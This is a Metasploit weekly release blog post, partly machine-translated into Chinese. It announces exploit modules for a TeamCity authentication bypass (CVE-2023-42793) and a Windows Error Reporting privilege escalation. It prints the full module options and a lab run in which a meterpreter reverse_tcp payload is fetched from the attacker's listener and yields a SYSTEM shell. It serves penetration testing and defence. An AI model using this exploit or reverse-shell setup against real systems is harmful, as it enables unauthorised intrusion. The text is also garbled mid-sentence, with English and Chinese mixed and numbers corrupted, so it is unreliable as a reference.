Last updated at Mon, 22 Jan 2024 21:52:32 GMT
TeamCity authentication bypass 和 remote code execution
This week’s Metasploit release includes a new module for a critical authentication bypass in JetBrains TeamCity CI/CD Server. All versions of TeamCity prior to version 2023.05.4个国家容易受到这个问题的影响. The vulnerability was originally discovered by SonarSource, 和 the Metasploit module was developed by Rapid7’s Principal Security 研究er Stephen Fewer who additionally published a technical analysis on CVE-2023-42793的攻击者kb. A Rapid7 TeamCity客户咨询 has also been released with details on mitigation guidance.
This exploit works against both Windows 和 Linux targets. 使用示例:
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,类型:主持人:港口][...]
RHOSTS 192年.168.159.10是目标主机
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
TEAMCITY_CHANGE_TIMEOUT 30 yes The timeout to wait f或者是 changes to be applied
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC 过程 yes Exit technique (Accepted: '', 医师, 线程, 过程, 没有一个)
FETCH_COMMAND CERTUTIL yes Comm和 to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
FETCH_DELETE false yes Attempt to delete the binary after execution
FETCH_FILENAME cymQYMMk no Name to use on remote system when storing payload; cannot contain spaces.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces.
LHOST 192年.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
开发目标:
身份证的名字
-- ----
0的窗户
View the full module info with the info, or info -d comm和.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit
[*]启动TCP反向处理程序.168.250.134:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+]目标易受攻击. JetBrains TeamCity 2023.05.检测到3 (build 129390).
[*] Token already exists, deleting 和 generating a new one.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*]内部修改.属性以允许创建流程...
[*] Waiting for configuration change to be applied...
[*]执行负载...
[*]内部复位.属性设置...
[*]发送阶段(200774字节)到192.168.250.237
[*] Waiting for configuration change to be applied...
[*]删除认证令牌.
[*]计量器第2次会话打开(192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400
meterpreter > getuid
服务器用户名:NT 作者ITY) \系统
meterpreter > sysinfo
计算机:DC
操作系统:Windows 2016+.0 Build 17763).
架构:x64
系统语言:en_US
域:MSFLAB
登录用户:9
计量器:x64/windows
meterpreter >
新增模块内容(2)
JetBrains TeamCity Unauthenticated Remote Code Execution
作者:sfewer-r7
类型:利用
拉的要求: #18408 提供的 sfewer-r7
路径: multi/http/jetbrains_teamcity_rce_cve_2023_42793
Description: This adds an unauthenticated RCE for JetBrain's TeamCity server on both Linux 和 Windows. A remote attacker can exploit an authentication bypass vulnerability 和 then execute OS comm和s in the context of the service.
Microsoft Error Reporting Local Privilege Elevation 脆弱性
Authors: Filip Dragović (Wh04m1001), Octoberfest7, 和 bwatters-r7
类型:利用
拉的要求: #18314 提供的 bwatters-r7
路径: windows /地方/ win_error_cve_2023_36874
Description: This adds an exploit module that leverages a directory traversal vulnerability in Windows 10. This vulnerability is identified as CVE-2023-36874 和 enables an attacker to elevate privileges to those of the NT 作者ITY) \系统
用户. Note that this module works with Windows 10x64 22H2.
增强功能和特性(1)
文档
You can find the latest Metasploit documentation on our 文档ite at 文档.metasploit.com.
得到它
As always, you can update to the latest Metasploit Framework with msfupdate
和 you can get more details on the changes since the last blog post 从
GitHub:
如果你是 git
用户,可以克隆 Metasploit框架 (主分支)为最新.
To install fresh without using git, you can use the open-source-only 夜间的安装程序 或者是
二进制安装程序 (也包括商业版).